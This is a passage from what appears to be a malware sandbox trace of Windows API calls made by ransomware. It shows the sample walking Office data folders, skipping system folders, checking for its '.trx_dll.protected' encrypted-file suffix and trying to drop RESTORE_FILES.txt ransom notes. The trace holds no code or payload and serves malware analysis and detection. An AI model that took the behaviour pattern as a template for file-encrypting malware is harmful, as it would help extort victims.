StrStrIW (lpFirst="OUTLLIBR.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.211] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.211] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.211] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.211] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.protected") returned 85 [0093.211] StrStrIW (lpFirst="OUTLWVW.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.211] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.211] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.212] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.212] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.212] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.212] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.212] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.protected") returned 84 [0093.212] StrStrIW (lpFirst="PPINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.212] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.212] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.212] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.212] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.212] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.212] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.212] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.protected") returned 85 [0093.212] StrStrIW (lpFirst="PPINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.212] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.212] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.protected") returned 86 [0093.212] StrStrIW (lpFirst="PUB6INTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.212] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="Program Files") returned 1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.212] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.protected") returned 87 [0093.212] StrStrIW (lpFirst="PUB6INTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.212] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.212] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.212] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="Program Files") returned 1 [0093.212] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.212] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.212] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.213] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.protected") returned 87 [0093.213] StrStrIW (lpFirst="PUBWZINT.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.213] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.213] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.213] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.213] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.213] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.213] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.213] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\RESTORE_FILES.txt") returned 73 [0093.213] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.213] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.213] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.213] lstrcmpiW (lpString1="SGRES.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.213] lstrcmpiW (lpString1="SGRES.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.213] lstrcmpiW (lpString1="SGRES.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.213] lstrcmpiW (lpString1="SGRES.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.213] lstrcmpiW (lpString1="SGRES.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.213] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.protected") returned 83 [0093.213] StrStrIW (lpFirst="SGRES.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.213] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.213] lstrcmpiW (lpString1="STINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.213] lstrcmpiW (lpString1="STINTL.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.213] lstrcmpiW (lpString1="STINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.213] lstrcmpiW (lpString1="STINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.213] lstrcmpiW (lpString1="STINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.213] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.protected") returned 84 [0093.213] StrStrIW (lpFirst="STINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.213] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.213] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.213] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.213] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.213] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.213] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll.protected", lpString2="System Volume Information") returned 1 [0093.213] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.protected") returned 86 [0093.213] StrStrIW (lpFirst="VISBRRES.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.214] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.214] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.214] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.214] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.214] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.214] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned 1 [0093.214] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.protected") returned 85 [0093.214] StrStrIW (lpFirst="VISINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.214] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll.protected", lpString2="Windows") returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned 1 [0093.214] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.protected") returned 84 [0093.214] StrStrIW (lpFirst="WWINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.214] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll.protected", lpString2="Windows") returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll.protected", lpString2="Program Files") returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.215] lstrcmpiW (lpString1="WWINTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.215] lstrcmpiW (lpString1="WWINTL.REST.trx_dll.protected", lpString2="System Volume Information") returned 1 [0093.215] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.protected") returned 85 [0093.215] StrStrIW (lpFirst="WWINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.215] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll.protected", lpString2="Windows") returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll.protected", lpString2="System Volume Information") returned 1 [0093.215] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.protected") returned 86 [0093.215] StrStrIW (lpFirst="XLINTL32.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.215] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll.protected", lpString2="Windows") returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll.protected", lpString2="Program Files") returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.216] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.216] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll.protected", lpString2="System Volume Information") returned 1 [0093.216] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.protected") returned 87 [0093.216] StrStrIW (lpFirst="XLINTL32.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.216] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.216] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll.protected", lpString2="Windows") returned 1 [0093.216] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.216] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.216] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.216] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll.protected", lpString2="System Volume Information") returned 1 [0093.216] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.protected") returned 86 [0093.216] StrStrIW (lpFirst="XLSLICER.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.216] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.216] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.216] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\RESTORE_FILES.txt") returned 73 [0093.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.216] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.216] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.216] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.216] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.216] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.216] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.216] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\RESTORE_FILES.txt") returned 68 [0093.216] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.216] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.216] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.216] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.217] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\RESTORE_FILES.txt") returned 68 [0093.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.218] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.218] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.218] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\RESTORE_FILES.txt") returned 57 [0093.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.219] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.219] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="Windows") returned -1 [0093.219] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="Program Files") returned -1 [0093.219] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="Program Files (x86)") returned -1 [0093.219] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="$Recycle.bin") returned 1 [0093.219] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="System Volume Information") returned -1 [0093.219] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform") returned 65 [0093.219] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2=".") returned 1 [0093.219] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="..") returned 1 [0093.219] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*") returned 67 [0093.219] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.219] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.219] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.219] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.220] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.220] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.220] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\.") returned 67 [0093.220] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.220] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.220] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.220] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.220] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.220] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.220] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.220] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\..") returned 68 [0093.220] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.220] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.220] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.220] lstrcmpiW (lpString1="Cache", lpString2="Windows") returned -1 [0093.220] lstrcmpiW (lpString1="Cache", lpString2="Program Files") returned -1 [0093.220] lstrcmpiW (lpString1="Cache", lpString2="Program Files (x86)") returned -1 [0093.220] lstrcmpiW (lpString1="Cache", lpString2="$Recycle.bin") returned 1 [0093.220] lstrcmpiW (lpString1="Cache", lpString2="System Volume Information") returned -1 [0093.220] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned 71 [0093.220] lstrcmpW (lpString1="Cache", lpString2=".") returned 1 [0093.220] lstrcmpW (lpString1="Cache", lpString2="..") returned 1 [0093.220] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*") returned 73 [0093.220] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.221] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.221] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.221] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.221] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.221] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.221] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\.") returned 73 [0093.221] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.221] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.221] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.221] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.221] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.221] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.221] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.221] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\..") returned 74 [0093.221] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.221] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.221] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.221] lstrcmpiW (lpString1="cache.dat.protected", lpString2="Windows") returned -1 [0093.221] lstrcmpiW (lpString1="cache.dat.protected", lpString2="Program Files") returned -1 [0093.221] lstrcmpiW (lpString1="cache.dat.protected", lpString2="Program Files (x86)") returned -1 [0093.221] lstrcmpiW (lpString1="cache.dat.protected", lpString2="$Recycle.bin") returned 1 [0093.221] lstrcmpiW (lpString1="cache.dat.protected", lpString2="System Volume Information") returned -1 [0093.221] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.protected") returned 91 [0093.221] StrStrIW (lpFirst="cache.dat.protected", lpSrch=".protected") returned=".protected" [0093.221] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.221] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.221] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.221] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.221] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.221] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.221] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RESTORE_FILES.txt") returned 89 [0093.221] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.221] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.221] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.221] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.222] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RESTORE_FILES.txt") returned 89 [0093.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.222] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.222] lstrcmpiW 